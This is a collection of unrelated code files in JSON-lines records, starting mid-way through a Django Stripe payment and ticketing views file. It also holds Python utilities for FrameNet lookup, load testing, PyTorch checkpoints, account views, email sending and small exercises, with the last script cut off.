l'uuid de la carte.\n for ligne_article in lignes_articles:\n carte = ligne_article.carte\n if carte:\n if request.method == 'GET':\n # On re-boucle pour récuperer les noms des articles vendus afin de les afficher sur le front\n for ligneArticle in lignes_articles:\n messages.success(request,\n f\"{ligneArticle.pricesold.price.product.name} : {ligneArticle.pricesold.price.name}\")\n\n messages.success(request, f\"Paiement validé. Merci !\")\n\n return HttpResponseRedirect(f\"/qr/{carte.uuid}#success\")\n else:\n return Response(f'VALID', status=status.HTTP_200_OK)\n\n elif paiement_stripe.status == Paiement_stripe.PAID:\n for ligne_article in paiement_stripe.lignearticle_set.all():\n if ligne_article.carte:\n messages.error(request,\n f\"Le paiement à bien été validé \"\n f\"mais un problème est apparu avec votre carte cashless. \"\n f\"Merci de contacter un responsable.\")\n return HttpResponseRedirect(f\"/qr/{ligne_article.carte.uuid}#erreurpaiement\")\n\n else:\n # on boucle ici pour récuperer l'uuid de la carte.\n for ligne_article in paiement_stripe.lignearticle_set.all():\n if ligne_article.carte:\n messages.error(request,\n f\"Un problème de validation de paiement a été detecté. \"\n f\"Merci de vérifier votre moyen de paiement et/ou contactez un responsable.\")\n return HttpResponseRedirect(f\"/qr/{ligne_article.carte.uuid}#erreurpaiement\")\n\n\n\n # Derniere action : on crée et envoie les billets si besoin\n elif paiement_stripe.source == Paiement_stripe.API_BILLETTERIE:\n if paiement_stripe.reservation:\n if paiement_stripe.reservation.status == Reservation.VALID:\n serializer = TicketSerializer(paiement_stripe.reservation.tickets.filter(status=Ticket.NOT_SCANNED),\n many=True, context=request)\n # import ipdb; ipdb.set_trace()\n data = {\n \"msg\": 'Paiement validé. Billets envoyés par mail.',\n \"tickets\": serializer.data,\n }\n return Response(\n data,\n status=status.HTTP_208_ALREADY_REPORTED\n )\n if paiement_stripe.status == Paiement_stripe.VALID:\n return Response(\n _('Paiement validé.'),\n status=status.HTTP_208_ALREADY_REPORTED\n )\n\n elif paiement_stripe.status == Paiement_stripe.PAID:\n logger.info(f\"Paiement_stripe.API_BILLETTERIE : {paiement_stripe.status}\")\n data = {\n \"msg\": 'Paiement validé. Création des billets et envoi par mail en cours.',\n }\n if paiement_stripe.reservation:\n serializer = TicketSerializer(paiement_stripe.reservation.tickets.all().exclude(status=Ticket.SCANNED),\n many=True)\n data['tickets'] = serializer.data\n return Response(\n data,\n status=status.HTTP_202_ACCEPTED\n )\n\n raise Http404(f'{paiement_stripe.status}')\n\n\n# Si on a l'uuid, on considère qu'on a la carte.\n# A réfléchir sur la suite en terme de vie privée ; AllowAny ?\n@permission_classes([permissions.AllowAny])\nclass GetFederatedAssetFromCashless(APIView):\n def get(self, request, pk_uuid):\n\n # on informe de la quantité de l'asset fédéré sur la carte.\n card = get_object_or_404(CarteCashless, uuid=pk_uuid)\n data = {\"stripe_wallet\": 0}\n try:\n wallet_stripe = card.wallet_set.get(asset__categorie=Asset.STRIPE_FED)\n data['stripe_wallet'] = wallet_stripe.qty\n return Response(data, status=status.HTTP_200_OK)\n except Exception as e:\n logger.error(f\"GetFederatedAssetFromCashless : {e}\")\n return Response(data, status=status.HTTP_404_NOT_FOUND)\n\n\n@permission_classes([permissions.AllowAny])\nclass UpdateFederatedAssetFromCashless(APIView):\n def post(self, request):\n \"\"\"\n Reception d'une demande d'update d'un portefeuille fédéré d'une carte cashless depuis un serveur cashless.\n On vérifie vers le serveur cashless ou vient la requete que la valeur est bonne (NTUI!)\n Ce qui nous permet de mettre ce point d'API en allowAny, de toute façon, on va vérifier !\n\n On met à jour la valeur en base de donnée sur la billetterie.\n Ensuite, on met à jour dans tous les serveurs cashless fédéré\n \"\"\"\n\n validator = UpdateFederatedAssetFromCashlessValidator(data=request.data)\n if not validator.is_valid():\n logger.error(\n f\"UpdateFederatedAssetFromCashless ERREUR validator.errors : {validator.errors} : request.data {request.data}\")\n return Response(validator.errors, status=status.HTTP_400_BAD_REQUEST)\n\n validated_data = validator.data\n wallet_stripe: Wallet = validated_data['wallet_stripe']\n carte: CarteCashless = validated_data['card']\n\n old_qty = validated_data['old_qty']\n new_qty = validated_data['new_qty']\n domain = validated_data['domain']\n uuid_log = validated_data['uuid_commande']\n\n # On log l'action\n logger.info(f\"UpdateFederatedAssetFromCashless validated_data : {validated_data}\")\n syncLog: SyncFederatedLog = validated_data['syncLog']\n\n # Une nouvelle vente a été faites sur un cashless avec la monnaie fédérée.\n # On va vérifier coté cashless si la valeur reçue est bonne (NTUI!)\n if wallet_stripe.qty == old_qty and wallet_stripe.qty != new_qty:\n logger.info(f\"UpdateFederatedAssetFromCashless NEED MAJ : {carte} - {wallet_stripe.qty} == {old_qty}\")\n\n # On utilise la class qui va vérifier si tout existe et qui récupère les assets dans le serveur cashless\n validated_wallet = WalletValidator(uuid=carte.uuid)\n dict_carte_from_cashless = validated_wallet.carte_serveur_cashless\n\n new_qty_verified = None\n for asset in dict_carte_from_cashless.get('assets'):\n if asset['categorie_mp'] == 'SF':\n new_qty_verified = Decimal(asset['qty'])\n\n # La valeur reçue par l'api allowAny correspond\n # à la valeur du serveur cashless\n # vérifié grâce à une API avec clé d'authentification\n if new_qty_verified == new_qty:\n\n wallet_stripe.qty = new_qty\n wallet_stripe.save()\n # TODO: logger\n logger.info(\n f\"UpdateFederatedAssetFromCashless MAJ : {carte} - {wallet_stripe.qty} == {new_qty} - {domain}\")\n return Response(f\"log {syncLog.uuid}\", status=status.HTTP_202_ACCEPTED)\n\n # La valeur reçue est différente de celle du serveur cashless\n # NTUI ???\n else:\n logger.error(f\"UpdateFederatedAssetFromCashless ERREUR : {carte} - {new_qty_verified} != {new_qty}\")\n return Response(\n f\"UpdateFederatedAssetFromCashless ERROR new_qty_verified : {carte} - wallet {wallet_stripe.qty}, old {old_qty}, new {new_qty}, new_verified {new_qty_verified}\",\n status=status.HTTP_406_NOT_ACCEPTABLE)\n\n\n # Pas besoin de mise à jour.\n elif wallet_stripe.qty == new_qty:\n logger.info(f\"UpdateFederatedAssetFromCashless NO MAJ : {carte} - {wallet_stripe.qty} == {new_qty}\")\n tenant_uuid = str(connection.tenant.uuid)\n syncLog.etat_client_sync[tenant_uuid]['return'] = True\n syncLog.etat_client_sync[tenant_uuid]['return_value'] = f\"{new_qty}\"\n syncLog.save()\n return Response(f\"NO NEED TO UPDATE - log {syncLog.uuid} already reported\",\n status=status.HTTP_208_ALREADY_REPORTED)\n\n # La valeur old est différente de celle du serveur cashless\n erreur = f\"UpdateFederatedAssetFromCashless ERROR : \" \\\n f\"log {syncLog.uuid} - carte {carte} - \" \\\n f\"billetterie wallet {wallet_stripe.qty} != cashless old {old_qty} ou new {new_qty}\"\n syncLog.etat_client_sync = erreur\n syncLog.save()\n\n logger.error(erreur)\n\n return Response(erreur, status=status.HTTP_409_CONFLICT)\n\n\ndef info_connected_account_stripe(id_acc_connect):\n stripe.api_key = RootConfiguration.get_solo().get_stripe_api()\n info_stripe = stripe.Account.retrieve(id_acc_connect)\n return info_stripe\n\n\ndef create_account_link_for_onboard(id_acc_connect=False):\n rootConf = RootConfiguration.get_solo()\n stripe.api_key = rootConf.get_stripe_api()\n\n meta = Client.objects.filter(categorie=Client.META)[0]\n meta_url = meta.get_primary_domain().domain\n\n if not id_acc_connect:\n acc_connect = stripe.Account.create(\n type=\"standard\",\n country=\"FR\",\n )\n id_acc_connect = acc_connect.get('id')\n\n account_link = stripe.AccountLink.create(\n account=id_acc_connect,\n refresh_url=f\"https://{meta_url}/api/onboard_stripe_return/{id_acc_connect}\",\n return_url=f\"https://{meta_url}/api/onboard_stripe_return/{id_acc_connect}\",\n type=\"account_onboarding\",\n )\n\n url_onboard = account_link.get('url')\n return url_onboard\n\n\n@permission_classes([permissions.AllowAny])\nclass Onboard_stripe_return(APIView):\n def get(self, request, id_acc_connect):\n details_submitted = info_connected_account_stripe(id_acc_connect).details_submitted\n if details_submitted:\n logger.info(f\"details_submitted : {details_submitted}\")\n return HttpResponseRedirect(f\"/onboardreturn/{id_acc_connect}/\")\n else:\n return Response(f\"{create_account_link_for_onboard()}\", status=status.HTTP_206_PARTIAL_CONTENT)\n\n\n@permission_classes([permissions.AllowAny])\nclass Onboard(APIView):\n def get(self, request):\n return Response(f\"{create_account_link_for_onboard()}\", status=status.HTTP_202_ACCEPTED)\n\n\n@permission_classes([permissions.AllowAny])\nclass Webhook_stripe(APIView):\n\n def post(self, request):\n payload = request.data\n logger.info(f\" \")\n # logger.info(f\"Webhook_stripe --> {payload}\")\n logger.info(f\"Webhook_stripe --> {payload.get('type')} - id : {payload.get('id')}\")\n logger.info(f\" \")\n\n # c'est une requete depuis les webhook\n # configuré dans l'admin stripe\n if payload.get('type') == \"checkout.session.completed\":\n # logger.debug(f\"Webhook_stripe checkout.session.completed : {payload}\")\n\n tenant_uuid_in_metadata = payload[\"data\"][\"object\"][\"metadata\"].get(\"tenant\")\n if not tenant_uuid_in_metadata:\n logger.warning(\n f\"Webhook_stripe checkout.session.completed - id : {payload.get('id')} - no tenant in metadata\")\n return Response(\"no tenant in metadata\",\n status=status.HTTP_204_NO_CONTENT)\n\n # On utilise les metadata du paiement stripe pour savoir de quel tenant cela vient.\n if f\"{connection.tenant.uuid}\" != tenant_uuid_in_metadata:\n tenant = get_object_or_404(Client, uuid=tenant_uuid_in_metadata)\n with tenant_context(tenant):\n paiement_stripe = get_object_or_404(Paiement_stripe,\n checkout_session_id_stripe=payload['data']['object']['id'])\n return paiment_stripe_validator(request, paiement_stripe)\n\n paiement_stripe = get_object_or_404(\n Paiement_stripe,\n checkout_session_id_stripe=payload['data']['object']['id']\n )\n return paiment_stripe_validator(request, paiement_stripe)\n\n\n # Prélèvement automatique d'un abonnement :\n # elif payload.get('type') == \"customer.subscription.updated\":\n # # on récupère le don dans le paiement récurent si besoin\n # logger.info(f\"Webhook_stripe customer.subscription.updated : {payload['data']['object']['id']}\")\n # logger.info(f\"\")\n # logger.info(f\"\")\n # logger.info(f\"{payload}\")\n # logger.info(f\"\")\n # logger.info(f\"\")\n\n elif payload.get('type') == \"invoice.paid\":\n # logger.info(f\" \")\n # logger.info(payload)\n # logger.info(f\" \")\n\n logger.info(f\"Webhook_stripe invoice.paid : {payload}\")\n payload_object = payload['data']['object']\n billing_reason = payload_object.get('billing_reason')\n\n # C'est un renouvellement d'abonnement\n if billing_reason == 'subscription_cycle' \\\n and payload_object.get('paid'):\n\n product_sold_stripe_id = None\n for line in payload_object['lines']['data']:\n product_sold_stripe_id = line['price']['product']\n break\n\n # On va chercher le tenant de l'abonnement grâce à l'id du product stripe\n # dans la requete POST\n with schema_context('public'):\n try:\n product_from_public_tenant = ProductDirectory.objects.get(\n product_sold_stripe_id=product_sold_stripe_id,\n )\n place = product_from_public_tenant.place\n except ProductDirectory.DoesNotExist:\n logger.error(\n f\"Webhook_stripe invoice.paid DoesNotExist : product_sold_stripe_id {product_sold_stripe_id}, serveur de test ?\")\n return Response('ProductDirectory DoesNotExist, serveur de test ?',\n status=status.HTTP_204_NO_CONTENT)\n\n # On a le tenant ( place ), on va chercher l'abonnement\n with tenant_context(place):\n invoice = payload_object['id']\n try:\n membership = Membership.objects.get(\n stripe_id_subscription=payload_object['subscription']\n )\n last_stripe_invoice = membership.last_stripe_invoice\n\n # Même adhésion, mais facture différente :\n # C'est alors un renouvellement automatique.\n if invoice != last_stripe_invoice:\n logger.info((f' nouvelle facture arrivée : {invoice}'))\n paiement_stripe = new_entry_from_stripe_invoice(membership.user, invoice)\n\n return paiment_stripe_validator(request, paiement_stripe)\n\n else:\n logger.info((f' facture déja créée et comptabilisée : {invoice}'))\n\n except Membership.DoesNotExist:\n logger.info((f' Nouvelle adhésion, facture pas encore comptabilisée : {invoice}'))\n except Exception:\n logger.error((f' erreur dans Webhook_stripe customer.subscription.updated : {Exception}'))\n raise Exception\n\n # c'est une requete depuis vue.js.\n post_from_front_vue_js = payload.get('uuid')\n if post_from_front_vue_js:\n logger.info(f\"Webhook_stripe post_from_front_vue_js : {payload}\")\n paiement_stripe = get_object_or_404(Paiement_stripe,\n uuid=post_from_front_vue_js)\n return paiment_stripe_validator(request, paiement_stripe)\n\n # Réponse pour l'api stripe qui envoie des webhook pour tout autre que la validation de paiement.\n # Si on renvoie une erreur, ils suppriment le webhook de leur côté.\n return Response('Pouple', status=status.HTTP_207_MULTI_STATUS)\n\n def get(self, request, uuid_paiement):\n logger.info(\"*\" * 30)\n logger.info(f\"{datetime.now()} - Webhook_stripe GET : {uuid_paiement}\")\n logger.info(\"*\" * 30)\n\n paiement_stripe = get_object_or_404(Paiement_stripe,\n uuid=uuid_paiement)\n return paiment_stripe_validator(request, paiement_stripe)\n","repo_name":"TiBillet/TiBillet","sub_path":"DjangoFiles/ApiBillet/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":60531,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"86"} +{"seq_id":"13202430839","text":"#! /usr/bin/python\n\n# To change this license header, choose License Headers in Project Properties.\n# To change this template file, choose Tools | Templates\n# and open the template in the editor.\n\n__author__ = \"slouvan\"\n__date__ = \"$Oct 20, 2015 12:56:06 AM$\"\n\nfrom pprint import pprint\nfrom nltk.corpus import framenet as fn\nimport sys\n\ndef getFrame(lex):\n \n frameList = []\n frames = fn.frames_by_lemma(lex)\n for frame in frames:\n frameList.append(frame.name)\n return frameList\n\ndef getAllFrames():\n fNames = []\n for frame in fn.frames():\n #print frame.name +\"\\t\"+str(frame.ID)\n fNames.append(frame.name)\n return fNames\n\ndef getNbFrame():\n return len(fn.frames())\n\nif __name__ == \"__main__\":\n getFrame('burn.v')\n\n","repo_name":"StonyBrookNLP/SRL-Integrated","sub_path":"src/pymodule.py","file_name":"pymodule.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"20255201899","text":"# -*- coding:utf-8 -*-\n\"\"\"\n@Author:tang\n@File:locust_newtest.py\n@Time:2022/5/27 14:03\n说明:根据虫师视频讲解,编写样例,已进行了更新,HttpLocust不用,使用locust.HttpUser\n\"\"\"\nimport locust\nfrom locust import TaskSet, task\n\n\n# 定义用户行为\nclass UserBehavior(TaskSet):\n\n @task\n def baidu_page(self):\n self.client.get('/')\n\n\nclass WebsiteUser(locust.HttpUser):\n task_set = UserBehavior\n min_wait = 3000\n max_wait = 6000\n","repo_name":"tzk1986/UItest","sub_path":"testcase/locust_newtest.py","file_name":"locust_newtest.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"70436125083","text":"import wget\nimport os\n\nclass ReviewData:\n def __init__(self, input, golden, patch, msg):\n self.input : CodeData = input\n self.golden : CodeData = golden\n self.patch : str = patch\n self.msg : str = msg\n \n def download(self, root = '.'):\n self.input.download(root+'/input')\n self.golden.download(root+'/golden')\n patch_path = f'{root}/patch'\n with open(patch_path, 'w') as f:\n f.write(self.patch)\n f.close()\n msg_path = f'{root}/msg'\n with open(msg_path, 'w') as f:\n f.write(self.msg)\n f.close()\n \nclass CodeData:\n def __init__(self, link, path2file, sha):\n # path2file : tensorflow/lite/tools/benchmark/benchmark_performance_options.cc\n self.link = link\n self.raw_code = ''\n self.path = '/'.join(path2file.split('/')[:-1])\n self.sha = sha\n \n def download(self, root = '.'):\n out=f'{root}/{self.sha}/{self.path}'\n os.makedirs(out,exist_ok=True)\n wget.download(self.link, out=out)\n\nclass CodeDatabase:\n def __init__(self):\n self.pair_list : list[tuple[CodeData]] = []\n self.review_data_list : list[ReviewData] = []\n \n def append(self, input, golden):\n self.pair_list.append((input, golden))\n print('Datasize :', len(self.pair_list))\n \n def download_review_data(self):\n root = 'pair_data'\n for idx, pair in enumerate(self.pair_list):\n pair[0].download(f'{root}/{idx}/input')\n pair[1].download(f'{root}/{idx}/golden')\n \n def append_review_data(self, review_data):\n self.review_data_list.append(review_data)\n print('Datasize :', len(self.review_data_list))\n \n def download_review_data(self):\n root = 'pair_data'\n for idx, review_data in enumerate(self.review_data_list):\n review_data.download(f'{root}/{idx}')","repo_name":"jimmylegendary/AICodeGen","sub_path":"CodeDatabase.py","file_name":"CodeDatabase.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"34926644876","text":"import random\nlst = [random.randint(0, 22) for i in range(10)]\nmin_val = int(input(\"Минимальное значение: \"))\nmax_val = int(input(\"Максимальное значение: \"))\nres = []\n\nfor i in range(len(lst)):\n if min_val <= lst[i] <= max_val:\n res.append(i)\n \nprint(f\"Случайно сгенерированный массив чисел: {lst}\")\nif res:\n print(f\"Индексы элементов, значения которых принадлежат заданному диапазону {res}\")\nelse:\n print(\"В списке нет элементов, которые принадлежали бы заданному диапазону.\")","repo_name":"Alex880326/Python","sub_path":"№32.py","file_name":"№32.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"35717260092","text":"## this displays arrows where the error came from\n\n#this for importing\n\ndef arrows(text,pos_start, pos_end):\n result=''\n \n #calculate indices\n\n idx_start = max(text.rfind('\\n',0, pos_start.index), 0)\n idx_end = text.find('\\n', idx_start + 1)\n if idx_end < 0: idx_end = len(text)\n\n # Generate each line\n line_count = pos_end.line - pos_start.line + 1\n for i in range(line_count):\n line = text[idx_start:idx_end]\n col_start = pos_start.column if i == 0 else 0\n col_end = pos_end.column if i == line_count - 1 else len(line) -1\n\n # Append to result\n result += line + '\\n'\n result += ' ' * col_start + '^' * (col_end - col_start)\n\n #Re-calculate indice\n idx_start = idx_end\n idx_end = text.find('\\n', idx_start + 1)\n if idx_end < 0:\n idx_end = len(text)\n\n return result.replace('\\t','')\n \n","repo_name":"JMA-Dv/ByCode","sub_path":"arrows.py","file_name":"arrows.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"23715472639","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n#Input datasets \r\ninputs_set = np.array([[1,0], [1 ,0.8] , [1, 1.6], [1, 3] , [1, 4] , [1 ,5]]) \r\noutput_set = np.array([[0.5],[1],[4],[5],[6],[9]])\r\n\r\ninputs = np.array([[0],[0.8],[1.6],[3],[4],[5]])\r\n\r\nepochs = 100\r\nlr = 0.01\r\ninputLayerNeurons, outputLayerNeurons = 2,1\r\n\r\n#Random weights and bias initialization(from -2 to 2)\r\nweights = np.random.random(size=(inputLayerNeurons,outputLayerNeurons))\r\nprint(\"initial weights \")\r\nprint(weights)\r\nweights_set = []\r\ntotal_error = []\r\ncalc_error = [0]\r\nfor i in range(epochs):\r\n\r\n\t#Backpropagation\r\n error = output_set - np.dot(inputs_set,weights)\r\n calc_error = (error**2)/2\r\n total_error.append(calc_error.copy())\r\n\r\n #Updating Weights and Biases\r\n weights += inputs_set.T.dot(error) * lr\r\n weights_set.append(weights.copy())\r\n\r\n\r\nprint(\"Final weights:\")\r\nprint(*weights)\r\n\r\ntotal_error = [sum(list(x.flatten())) for x in total_error]\r\nweights_0 = [list(x[0]) for x in weights_set]\r\nweights_1 = [list(x[1]) for x in weights_set]\r\n\r\n\r\n#plt.plot(total_error)\r\n\r\n\r\nf1 = plt.figure()\r\nf2 = plt.figure()\r\nax1 = f1.add_subplot(111)\r\nax2 = f2.add_subplot(111)\r\n\r\n\r\nax1.set_title('Weight Trajectories vs epochs(number of iterations)')\r\nax1.set_xlabel('Number of iterations')\r\nax1.plot(weights_0, label = \"bias\")\r\nax1.plot(weights_1, label = \"Weight\")\r\nax1.legend(bbox_to_anchor=(1,1), loc='upper left', borderaxespad=0.)\r\n\r\nx = np.linspace(0,10,100)\r\ny = (weights_1[99])*x+ (weights_0[99])\r\nax2.set_title('LMS fitting result')\r\nax2.plot(x, y, '-r')\r\nax2.scatter(inputs, output_set)\r\nax2.grid()\r\n\r\nplt.show()\r\n","repo_name":"kriti0111/NeuralNetsAssignment","sub_path":"assignment4.py","file_name":"assignment4.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"31250633448","text":"import torch\nimport os\nimport random\nimport numpy as np\nimport logging\nfrom torch import nn\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n\ndef load_model(model, filepath):\n \"\"\"\n Loads model from file .pth\n :param model: ``XrayMRSCNN`` instance of model\n :param filepath: full path to file\n :return: ``XrayMRSCNN`` instance of model\n \"\"\"\n logger.info('Loading model...')\n model.load_state_dict(torch.load(filepath))\n model.eval()\n return model\n\n\ndef save_model(model, filepath):\n \"\"\"\n Saves all model\n :param model: ``XrayMRSCNN`` instance of model\n :param filepath: path to save directory\n \"\"\"\n torch.save(model.state_dict(), os.path.join(filepath, 'xray.pth'))\n\n\ndef set_seed(val):\n \"\"\"\n Freezes random sequences\n :param val: ``int`` random value\n \"\"\"\n random.seed(val)\n np.random.seed(val)\n torch.manual_seed(val)\n torch.cuda.manual_seed(val)\n torch.backends.cudnn.deterministic = True\n\n\ndef activation_func(activation):\n \"\"\"\n Gets instance of function\n :param activation: name function\n :return: instance of function\n \"\"\"\n return nn.ModuleDict([\n ['relu', nn.ReLU(inplace=False)],\n ['leaky_relu', nn.LeakyReLU(negative_slope=0.01, inplace=False)],\n ['selu', nn.SELU(inplace=False)],\n ['none', nn.Identity()]\n ])[activation]\n\n\ndef save_checkpoint(state, filename):\n \"\"\"\n Saves current state of model\n :param state: *args\n :param filename: path to save directory with filename\n \"\"\"\n torch.save(state, filename)\n\n\ndef make_checkpoint(epoch, model, optimizer, scheduler, loss_value, outdir):\n \"\"\"\n Saves current state train\n :param epoch: ``int`` number of current epoch\n :param model: instance of model\n :param optimizer: instance of optimizer\n :param scheduler: instance of scheduler\n :param loss_value: ``float`` current loss value\n :param outdir: ``str`` path to save directory\n \"\"\"\n save_name = os.path.join(outdir, 'xrayscnn_ep{}.pth'.format(epoch))\n save_checkpoint({\n 'start_epoch': epoch + 1,\n 'model': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'scheduler': scheduler.state_dict(),\n 'losses': loss_value\n }, save_name)\n print('Save model: {}'.format(save_name))\n\n\ndef load_checkpoint(state, model, optimizer, scheduler):\n \"\"\"\n Loads state of model\n :param state: ``Dict`` state train\n :param model: instance of model\n :param optimizer: instance of optimizer\n :param scheduler: instance of scheduler\n \"\"\"\n \"\"\"load previous state of model\"\"\"\n model.load_state_dict(state['model'])\n optimizer.load_state_dict(state['optimizer'])\n scheduler.load_state_dict(state['scheduler'])\n","repo_name":"ErrorInever/XrayRSCNN","sub_path":"models/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"6390998449","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom user_app.models import User, Kid\nfrom user_app.decorator import parent_required\nfrom claim.models import ClaimList\nfrom django.core.paginator import Paginator\n\n# Create your views here.\n@login_required(login_url='login')\ndef account(request):\n \n return render(request, \"account.html\", context = None)\n\n@login_required(login_url='login')\ndef account_info(request):\n if request.user.is_kid:\n account = User.objects.get(username = request.user)\n kid = Kid.objects.get(user = request.user)\n credit = kid.reward_credit\n parent = User.objects.get(username = kid.parent)\n\n return render(request, \"account_info.html\", {'account':account, 'credit':credit, 'parent':parent }, )\n elif request.user.is_parent:\n account = User.objects.get(username = request.user)\n kids = account.kids_parent.all()\n\n return render(request, \"account_info.html\", {'account':account, 'kids':kids,}, ) \n\n@parent_required\ndef kid_claim(request, kid_id):\n request.session['kid_id']=kid_id\n if Kid.objects.get(user=kid_id).parent == request.user:\n active_claims = ClaimList.objects.filter(user=kid_id, status='NEW')\n\n paginator= Paginator(active_claims, 10)\n page = request.GET.get(\"page\")\n active_claims = paginator.get_page(page)\n return render(request, \"kid_claim.html\", {'active_claims':active_claims} )\n else:\n return redirect('access_denied')\n\n@parent_required\ndef accept(request, claim_id):\n claim = ClaimList.objects.get(pk=claim_id)\n if request.session.has_key('kid_id'):\n kid_id=request.session['kid_id']\n if Kid.objects.get(user=kid_id).parent == request.user:\n kid = Kid.objects.get(user = kid_id)\n kid.reward_credit += 1\n kid.save()\n claim.status = 'ACCEPTED'\n claim.save()\n return redirect('kid_claim', kid_id = kid_id)\n else:\n return redirect('access_denied')\n else:\n return redirect('access_denied')\n\n@parent_required\ndef decline(request, claim_id):\n claim = ClaimList.objects.get(pk=claim_id)\n if request.session.has_key('kid_id'):\n kid_id=request.session['kid_id']\n if Kid.objects.get(user=kid_id).parent == request.user:\n claim.status = 'DECLINED'\n claim.save()\n return redirect('kid_claim', kid_id = kid_id)\n else:\n return redirect('access_denied')\n else:\n return redirect('access_denied')\n","repo_name":"sonofman5024/Home_Manager","sub_path":"account/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"9796038109","text":"# coding: utf-8\nimport re\nimport smtplib\nimport urllib\nimport os\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.mime.image import MIMEImage\nfrom django.conf import settings\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.contrib.sites.models import Site\nfrom .models import MailTemplate\nfrom django.template import Context, Template\nfrom django.template.loader import render_to_string\nfrom django.utils.translation import get_language\n\n\ndef send_email(subject, text, to, html=\"\", reply_email=''):\n from_email = settings.FROM_EMAIL\n\n mail = EmailMultiAlternatives(\n subject=subject, body=text, from_email=from_email, to=to)\n\n msgRoot = MIMEMultipart('related')\n msgRoot['Subject'] = subject\n msgRoot['From'] = from_email\n msgRoot['To'] = ', '.join(to)\n\n msgAlternative = MIMEMultipart('alternative')\n msgRoot.attach(msgAlternative)\n\n msgText = MIMEText(text.encode('UTF-8'), 'plain', 'UTF-8')\n msgAlternative.attach(msgText)\n\n links = re.compile(\"]*\\ssrc=\\\"(.*?)\\\"\").findall(html)\n media_root = settings.MEDIA_ROOT\n static_root = settings.STATIC_ROOT\n for i, link in enumerate(links):\n try:\n name = 'image%s' % i\n html = html.replace(link, 'cid:%s' % name)\n link = urllib.parse.unquote(\n link)\n if '/media/' in link and not link.startswith('/media/'):\n link = '/media/' + link.split('/media/')[1]\n elif '/static/' in link and not link.startswith('/static/'):\n link = '/static/' + link.split('/static/')[1]\n if '/media/' in link:\n path = os.path.join(media_root, link.split('/media/')[-1])\n elif '/static/' in link:\n path = os.path.join(\n static_root, link.split('/static/')[-1])\n fp = open(path, 'rb')\n msgImage = MIMEImage(fp.read(), _subtype=path.split('.')[-1])\n fp.close()\n\n msgImage.add_header('Content-ID', '<%s>' % name)\n msgRoot.attach(msgImage)\n except Exception as e:\n pass\n\n msgText = MIMEText(html.encode('UTF-8'), 'html', 'UTF-8')\n msgAlternative.attach(msgText)\n\n if to:\n try:\n use_gmail = getattr(settings, 'USE_GMAIL_SMTP', False)\n if use_gmail:\n smtp = smtplib.SMTP(settings.EMAIL_HOST)\n smtp.starttls()\n else:\n smtp = smtplib.SMTP()\n smtp.connect(settings.EMAIL_HOST)\n smtp.login(\n str(settings.EMAIL_HOST_USER),\n str(settings.EMAIL_HOST_PASSWORD)\n )\n smtp.sendmail(msgRoot['From'], to, msgRoot.as_string())\n smtp.quit()\n except:\n mail.attach_alternative(html, \"text/html\")\n mail.send(fail_silently=True)\n\ndef render(path, **params):\n \"\"\"Looking for template in DB firstly, than looking for the\n template on disk.\n \"\"\"\n name, file_type = path.split('/')[-1].split('.')\n site = Site.objects.get_current()\n site_url = f\"{settings.SITE_PROTOCOL}://{site}\"\n data = params\n language = get_language() or settings.LANGUAGE_CODE\n data.update({\n 'shop_name': getattr(\n settings, 'SHOP_NAME_%s' % language.upper(), \"\"),\n 'site': site,\n 'site_url': site_url\n })\n try:\n mail_template = MailTemplate.objects.get(name=name)\n template = mail_template.html_template\n\n t = Template(template)\n data.update({\n 'topic': mail_template.comment,\n })\n c = Context(data)\n return t.render(c)\n except MailTemplate.DoesNotExist:\n return render_to_string(path, data)\n","repo_name":"phonxis/konkord","sub_path":"konkord/apps/mail/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"34388752425","text":"input = __import__('sys').stdin.readline\nimport sys\n\ndef solution():\n n = int(input())\n if n == 0:\n sys.exit()\n\n ans = input().strip()\n a = ans.lower()\n for _ in range(n-1):\n temp = input().strip()\n if a > temp.lower():\n ans = temp\n a = temp.lower()\n\n print(ans)\n\nwhile 1:\n solution()","repo_name":"jungwookim/ps","sub_path":"boj/2204/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"25832435395","text":"#Gagandeep Singh Jossan gxj170003\r\n#Maitreyee Mhasakar mam171630\r\n\r\nimport pandas as pd\r\nfrom nltk.corpus import wordnet as wn\r\nimport spacy\r\nnlp = spacy.load('en')\r\nfrom nltk.stem.wordnet import WordNetLemmatizer\r\nfrom nltk import pos_tag\r\nimport numpy as np\r\nfrom nltk.corpus.reader import NOUN\r\nfrom nltk.corpus.reader import VERB\r\n#Load dataset into dataframe\r\n#df=pd.read_csv('C:/Users/gagan/OneDrive/Desktop/NLPProject/data/sample_train.txt', 